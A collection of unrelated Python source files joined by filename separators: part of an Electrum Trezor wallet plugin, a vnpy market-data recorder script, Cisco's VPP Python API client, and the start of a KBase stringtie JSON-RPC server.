client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
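    # Illustrative sketch (the xpubs and derivation suffixes below are assumptions,
    # not taken from a real wallet): a 2-of-3 multisig would be assembled roughly as
    #     self._make_multisig(2, [(xpub1, [0, 5]), (xpub2, [0, 5]), (xpub3, [0, 5])])
    # yielding a MultisigRedeemScriptType with three HDNodePathType pubkeys,
    # three empty signature placeholders and m=2.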
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
runDataRecording.py
|
# encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import okcoinGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-' * 30)
    # Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
# le.addConsoleHandler()
    le.info(u'Starting the market data recording child process')
ee = EventEngine2()
    le.info(u'Event engine created successfully')
me = MainEngine(ee)
me.addGateway(okcoinGateway)
me.addApp(dataRecorder)
    le.info(u'Main engine created successfully')
ee.register(EVENT_LOG, le.processLogEvent)
    le.info(u'Registered log event listener')
me.connect('OKEX')
    le.info(u'Connecting to the OKEX gateway')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
    # Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
    le.info(u'Starting the market data recording supervisor (parent) process')
    DAY_START = time(8, 57)    # day session start and stop times
DAY_END = time(15, 18)
    NIGHT_START = time(20, 57)    # night session start and stop times
NIGHT_END = time(2, 33)
    p = None    # child process handle
while True:
currentTime = datetime.now().time()
recording = True
        # # Determine which trading session the current time falls in
# if ((currentTime >= DAY_START and currentTime <= DAY_END) or
# (currentTime >= NIGHT_START) or
# (currentTime <= NIGHT_END)):
# recording = True
#
        # # Skip weekend periods: all of Saturday, the Friday night session and the Sunday day session
# if ((datetime.today().weekday() == 6) or
# (datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
# (datetime.today().weekday() == 0 and currentTime < DAY_START)):
# recording = False
        # During recording hours, start the child process if it is not running
if p is None or not p.is_alive():
            le.info(u'Starting child process')
p = multiprocessing.Process(target=runChildProcess)
p.start()
            le.info(u'Child process started successfully')
        # Outside recording hours, shut down the child process
# if not recording and p is not None:
        # le.info(u'Stopping child process')
# p.terminate()
# p.join()
# p = None
        # le.info(u'Child process stopped successfully')
sleep(5)
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
|
vpp_papi.py
|
#!/usr/bin/env python
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import absolute_import
import ctypes
import sys
import multiprocessing as mp
import os
import logging
import functools
import json
import threading
import fnmatch
import weakref
import atexit
from . vpp_serializer import VPPType, VPPEnumType, VPPUnionType
from . vpp_serializer import VPPMessage, vpp_get_type, VPPTypeAlias
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
__all__ = ('FuncWrapper', 'VPP', 'VppApiDynamicMethodHolder',
'VppEnum', 'VppEnumType',
'VPPIOError', 'VPPRuntimeError', 'VPPValueError',
'VPPApiClient', )
def metaclass(metaclass):
@functools.wraps(metaclass)
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class VppEnumType(type):
def __getattr__(cls, name):
t = vpp_get_type(name)
return t.enum
@metaclass(VppEnumType)
class VppEnum(object):
pass
def vpp_atexit(vpp_weakref):
"""Clean up VPP connection on shutdown."""
vpp_instance = vpp_weakref()
if vpp_instance and vpp_instance.transport.connected:
vpp_instance.logger.debug('Cleaning up VPP on exit')
vpp_instance.disconnect()
if sys.version[0] == '2':
def vpp_iterator(d):
return d.iteritems()
else:
def vpp_iterator(d):
return d.items()
class VppApiDynamicMethodHolder(object):
pass
class FuncWrapper(object):
def __init__(self, func):
self._func = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, **kwargs):
return self._func(**kwargs)
def __repr__(self):
return '<FuncWrapper(func=<%s(%s)>)>' % (self.__name__, self.__doc__)
class VPPApiError(Exception):
pass
class VPPNotImplementedError(NotImplementedError):
pass
class VPPIOError(IOError):
pass
class VPPRuntimeError(RuntimeError):
pass
class VPPValueError(ValueError):
pass
class VPPApiJSONFiles(object):
@classmethod
def find_api_dir(cls, dirs):
"""Attempt to find the best directory in which API definition
files may reside. If the value VPP_API_DIR exists in the environment
then it is first on the search list. If we're inside a recognized
location in a VPP source tree (src/scripts and src/vpp-api/python)
then entries from there to the likely locations in build-root are
added. Finally the location used by system packages is added.
:returns: A single directory name, or None if no such directory
could be found.
"""
# perhaps we're in the 'src/scripts' or 'src/vpp-api/python' dir;
# in which case, plot a course to likely places in the src tree
import __main__ as main
if hasattr(main, '__file__'):
# get the path of the calling script
localdir = os.path.dirname(os.path.realpath(main.__file__))
else:
# use cwd if there is no calling script
localdir = os.getcwd()
localdir_s = localdir.split(os.path.sep)
def dmatch(dir):
"""Match dir against right-hand components of the script dir"""
d = dir.split('/') # param 'dir' assumes a / separator
length = len(d)
return len(localdir_s) > length and localdir_s[-length:] == d
def sdir(srcdir, variant):
"""Build a path from srcdir to the staged API files of
'variant' (typically '' or '_debug')"""
# Since 'core' and 'plugin' files are staged
# in separate directories, we target the parent dir.
return os.path.sep.join((
srcdir,
'build-root',
'install-vpp%s-native' % variant,
'vpp',
'share',
'vpp',
'api',
))
srcdir = None
if dmatch('src/scripts'):
srcdir = os.path.sep.join(localdir_s[:-2])
elif dmatch('src/vpp-api/python'):
srcdir = os.path.sep.join(localdir_s[:-3])
elif dmatch('test'):
# we're apparently running tests
srcdir = os.path.sep.join(localdir_s[:-1])
if srcdir:
# we're in the source tree, try both the debug and release
# variants.
dirs.append(sdir(srcdir, '_debug'))
dirs.append(sdir(srcdir, ''))
# Test for staged copies of the scripts
# For these, since we explicitly know if we're running a debug versus
# release variant, target only the relevant directory
if dmatch('build-root/install-vpp_debug-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, '_debug'))
if dmatch('build-root/install-vpp-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, ''))
# finally, try the location system packages typically install into
dirs.append(os.path.sep.join(('', 'usr', 'share', 'vpp', 'api')))
# check the directories for existence; first one wins
for dir in dirs:
if os.path.isdir(dir):
return dir
return None
@classmethod
def find_api_files(cls, api_dir=None, patterns='*'):
"""Find API definition files from the given directory tree with the
given pattern. If no directory is given then find_api_dir() is used
to locate one. If no pattern is given then all definition files found
in the directory tree are used.
:param api_dir: A directory tree in which to locate API definition
files; subdirectories are descended into.
If this is None then find_api_dir() is called to discover it.
:param patterns: A list of patterns to use in each visited directory
when looking for files.
This can be a list/tuple object or a comma-separated string of
            patterns. Each value in the list will have leading/trailing
whitespace stripped.
The pattern specifies the first part of the filename, '.api.json'
is appended.
The results are de-duplicated, thus overlapping patterns are fine.
If this is None it defaults to '*' meaning "all API files".
:returns: A list of file paths for the API files found.
"""
if api_dir is None:
api_dir = cls.find_api_dir([])
if api_dir is None:
raise VPPApiError("api_dir cannot be located")
if isinstance(patterns, list) or isinstance(patterns, tuple):
patterns = [p.strip() + '.api.json' for p in patterns]
else:
patterns = [p.strip() + '.api.json' for p in patterns.split(",")]
api_files = []
for root, dirnames, files in os.walk(api_dir):
# iterate all given patterns and de-dup the result
files = set(sum([fnmatch.filter(files, p) for p in patterns], []))
for filename in files:
api_files.append(os.path.join(root, filename))
return api_files
@classmethod
def process_json_file(self, apidef_file):
api = json.load(apidef_file)
types = {}
services = {}
messages = {}
for t in api['enums']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'enum', 'data': t}
for t in api['unions']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'union', 'data': t}
for t in api['types']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'type', 'data': t}
for t, v in api['aliases'].items():
types['vl_api_' + t + '_t'] = {'type': 'alias', 'data': v}
services.update(api['services'])
i = 0
while True:
unresolved = {}
for k, v in types.items():
t = v['data']
if not vpp_get_type(k):
if v['type'] == 'enum':
try:
VPPEnumType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'union':
try:
VPPUnionType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'type':
try:
VPPType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'alias':
try:
VPPTypeAlias(k, t)
except ValueError:
unresolved[k] = v
if len(unresolved) == 0:
break
if i > 3:
raise VPPValueError('Unresolved type definitions {}'
.format(unresolved))
types = unresolved
i += 1
for m in api['messages']:
try:
messages[m[0]] = VPPMessage(m[0], m[1:])
except VPPNotImplementedError:
### OLE FIXME
self.logger.error('Not implemented error for {}'.format(m[0]))
return messages, services
class VPPApiClient(object):
"""VPP interface.
    This class provides the APIs to VPP. The APIs are loaded
    from the provided .api.json files and corresponding functions
    are created dynamically. These functions are documented in
    the VPP .api files from which they are generated.
Additionally, VPP can send callback messages; this class
provides a means to register a callback function to receive
these messages in a background thread.
"""
apidir = None
VPPApiError = VPPApiError
VPPRuntimeError = VPPRuntimeError
VPPValueError = VPPValueError
VPPNotImplementedError = VPPNotImplementedError
VPPIOError = VPPIOError
def __init__(self, apifiles=None, testmode=False, async_thread=True,
logger=None, loglevel=None,
read_timeout=5, use_socket=False,
server_address='/run/vpp/api.sock'):
"""Create a VPP API object.
apifiles is a list of files containing API
descriptions that will be loaded - methods will be
dynamically created reflecting these APIs. If not
provided this will load the API files from VPP's
default install location.
logger, if supplied, is the logging logger object to log to.
loglevel, if supplied, is the log level this logger is set
to report at (from the loglevels in the logging module).
"""
if logger is None:
logger = logging.getLogger(
"{}.{}".format(__name__, self.__class__.__name__))
if loglevel is not None:
logger.setLevel(loglevel)
self.logger = logger
self.messages = {}
self.services = {}
self.id_names = []
self.id_msgdef = []
self.header = VPPType('header', [['u16', 'msgid'],
['u32', 'client_index']])
self.apifiles = []
self.event_callback = None
self.message_queue = queue.Queue()
self.read_timeout = read_timeout
self.async_thread = async_thread
self.event_thread = None
self.testmode = testmode
self.use_socket = use_socket
self.server_address = server_address
self._apifiles = apifiles
if use_socket:
from . vpp_transport_socket import VppTransport
else:
from . vpp_transport_shmem import VppTransport
if not apifiles:
# Pick up API definitions from default directory
try:
apifiles = VPPApiJSONFiles.find_api_files(self.apidir)
except RuntimeError:
# In test mode we don't care that we can't find the API files
if testmode:
apifiles = []
else:
raise VPPRuntimeError
for file in apifiles:
with open(file) as apidef_file:
m, s = VPPApiJSONFiles.process_json_file(apidef_file)
self.messages.update(m)
self.services.update(s)
self.apifiles = apifiles
# Basic sanity check
if len(self.messages) == 0 and not testmode:
raise VPPValueError(1, 'Missing JSON message definitions')
self.transport = VppTransport(self, read_timeout=read_timeout,
server_address=server_address)
# Make sure we allow VPP to clean up the message rings.
atexit.register(vpp_atexit, weakref.ref(self))
def get_function(self, name):
return getattr(self._api, name)
class ContextId(object):
"""Multiprocessing-safe provider of unique context IDs."""
def __init__(self):
self.context = mp.Value(ctypes.c_uint, 0)
self.lock = mp.Lock()
def __call__(self):
"""Get a new unique (or, at least, not recently used) context."""
with self.lock:
self.context.value += 1
return self.context.value
get_context = ContextId()
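    # Each call to self.get_context() hands out a fresh integer that is safe to
    # use across processes, e.g. 1, 2, 3, ... for successive requests.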
def get_type(self, name):
return vpp_get_type(name)
@property
def api(self):
if not hasattr(self, "_api"):
raise VPPApiError("Not connected, api definitions not available")
return self._api
def make_function(self, msg, i, multipart, do_async):
if (do_async):
def f(**kwargs):
return self._call_vpp_async(i, msg, **kwargs)
else:
def f(**kwargs):
return self._call_vpp(i, msg, multipart, **kwargs)
f.__name__ = str(msg.name)
f.__doc__ = ", ".join(["%s %s" %
(msg.fieldtypes[j], k)
for j, k in enumerate(msg.fields)])
f.msg = msg
return f
def _register_functions(self, do_async=False):
self.id_names = [None] * (self.vpp_dictionary_maxid + 1)
self.id_msgdef = [None] * (self.vpp_dictionary_maxid + 1)
self._api = VppApiDynamicMethodHolder()
for name, msg in vpp_iterator(self.messages):
n = name + '_' + msg.crc[2:]
i = self.transport.get_msg_index(n)
if i > 0:
self.id_msgdef[i] = msg
self.id_names[i] = name
# Create function for client side messages.
if name in self.services:
if 'stream' in self.services[name] and \
self.services[name]['stream']:
multipart = True
else:
multipart = False
f = self.make_function(msg, i, multipart, do_async)
setattr(self._api, name, FuncWrapper(f))
else:
self.logger.debug(
'No such message type or failed CRC checksum: %s', n)
def connect_internal(self, name, msg_handler, chroot_prefix, rx_qlen,
do_async):
pfx = chroot_prefix.encode('utf-8') if chroot_prefix else None
rv = self.transport.connect(name, pfx,
msg_handler, rx_qlen)
if rv != 0:
raise VPPIOError(2, 'Connect failed')
self.vpp_dictionary_maxid = self.transport.msg_table_max_index()
self._register_functions(do_async=do_async)
# Initialise control ping
crc = self.messages['control_ping'].crc
self.control_ping_index = self.transport.get_msg_index(
('control_ping' + '_' + crc[2:]))
self.control_ping_msgdef = self.messages['control_ping']
if self.async_thread:
self.event_thread = threading.Thread(
target=self.thread_msg_handler)
self.event_thread.daemon = True
self.event_thread.start()
else:
self.event_thread = None
return rv
def connect(self, name, chroot_prefix=None, do_async=False, rx_qlen=32):
"""Attach to VPP.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
do_async - if true, messages are sent without waiting for a reply
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
msg_handler = self.transport.get_callback(do_async)
return self.connect_internal(name, msg_handler, chroot_prefix, rx_qlen,
do_async)
def connect_sync(self, name, chroot_prefix=None, rx_qlen=32):
"""Attach to VPP in synchronous mode. Application must poll for events.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
return self.connect_internal(name, None, chroot_prefix, rx_qlen,
do_async=False)
def disconnect(self):
"""Detach from VPP."""
rv = self.transport.disconnect()
if self.event_thread is not None:
self.message_queue.put("terminate event thread")
return rv
def msg_handler_sync(self, msg):
"""Process an incoming message from VPP in sync mode.
The message may be a reply or it may be an async notification.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
# If we have a context, then use the context to find any
# request waiting for a reply
context = 0
if hasattr(r, 'context') and r.context > 0:
context = r.context
if context == 0:
# No context -> async notification that we feed to the callback
self.message_queue.put_nowait(r)
else:
raise VPPIOError(2, 'RPC reply message received in event handler')
def has_context(self, msg):
if len(msg) < 10:
return False
header = VPPType('header_with_context', [['u16', 'msgid'],
['u32', 'client_index'],
['u32', 'context']])
(i, ci, context), size = header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if 'context' in msgobj.field_by_name and context >= 0:
return True
return False
def decode_incoming_msg(self, msg, no_type_conversion=False):
if not msg:
self.logger.warning('vpp_api.read failed')
return
(i, ci), size = self.header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if not msgobj:
raise VPPIOError(2, 'Reply message undefined')
r, size = msgobj.unpack(msg, ntc=no_type_conversion)
return r
def msg_handler_async(self, msg):
"""Process a message from VPP in async mode.
In async mode, all messages are returned to the callback.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def _control_ping(self, context):
"""Send a ping command."""
self._call_vpp_async(self.control_ping_index,
self.control_ping_msgdef,
context=context)
def validate_args(self, msg, kwargs):
d = set(kwargs.keys()) - set(msg.field_by_name.keys())
if d:
raise VPPValueError('Invalid argument {} to {}'
.format(list(d), msg.name))
def _call_vpp(self, i, msgdef, multipart, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
multipart - True if the message returns multiple
messages in return.
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The return value is the message or message array containing
the response. It will raise an IOError exception if there was
no response within the timeout window.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
kwargs['_vl_msg_id'] = i
no_type_conversion = kwargs.pop('_no_type_conversion', False)
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
pass
self.validate_args(msgdef, kwargs)
s = 'Calling {}({})'.format(msgdef.name,
','.join(['{!r}:{!r}'.format(k, v) for k, v in kwargs.items()]))
self.logger.debug(s)
b = msgdef.pack(kwargs)
self.transport.suspend()
self.transport.write(b)
if multipart:
# Send a ping after the request - we use its response
# to detect that we have seen all results.
self._control_ping(context)
# Block until we get a reply.
rl = []
while (True):
msg = self.transport.read()
if not msg:
raise VPPIOError(2, 'VPP API client: read failed')
r = self.decode_incoming_msg(msg, no_type_conversion)
msgname = type(r).__name__
if context not in r or r.context == 0 or context != r.context:
# Message being queued
self.message_queue.put_nowait(r)
continue
if not multipart:
rl = r
break
if msgname == 'control_ping_reply':
break
rl.append(r)
self.transport.resume()
self.logger.debug('Return from {!r}'.format(r))
return rl
def _call_vpp_async(self, i, msg, **kwargs):
"""Given a message, send the message and return the context.
msgdef - the message packing definition
i - the message type index
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The reply message(s) will be delivered later to the registered callback.
The returned context will help with assigning which call
the reply belongs to.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
kwargs['client_index'] = 0
kwargs['_vl_msg_id'] = i
b = msg.pack(kwargs)
self.transport.write(b)
return context
def register_event_callback(self, callback):
"""Register a callback for async messages.
This will be called for async notifications in sync mode,
and all messages in async mode. In sync mode, replies to
requests will not come here.
callback is a fn(msg_type_name, msg_type) that will be
called when a message comes in. While this function is
executing, note that (a) you are in a background thread and
may wish to use threading.Lock to protect your datastructures,
and (b) message processing from VPP will stop (so if you take
a long while about it you may provoke reply timeouts or cause
VPP to fill the RX buffer). Passing None will disable the
callback.
"""
self.event_callback = callback
def thread_msg_handler(self):
"""Python thread calling the user registered message handler.
This is to emulate the old style event callback scheme. Modern
clients should provide their own thread to poll the event
queue.
"""
while True:
r = self.message_queue.get()
if r == "terminate event thread":
break
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def __repr__(self):
return "<VPPApiClient apifiles=%s, testmode=%s, async_thread=%s, " \
"logger=%s, read_timeout=%s, use_socket=%s, " \
"server_address='%s'>" % (
self._apifiles, self.testmode, self.async_thread,
self.logger, self.read_timeout, self.use_socket,
self.server_address)
# Provide the old name for backward compatibility.
VPP = VPPApiClient
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
kb_stringtieServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_stringtie.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_stringtie'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_stringtie.kb_stringtieImpl import kb_stringtie # noqa @IgnorePep8
impl_kb_stringtie = kb_stringtie(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
        This method is the same as call() except the return value is a Python
        object instead of a JSON string. It is mainly useful for
        debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
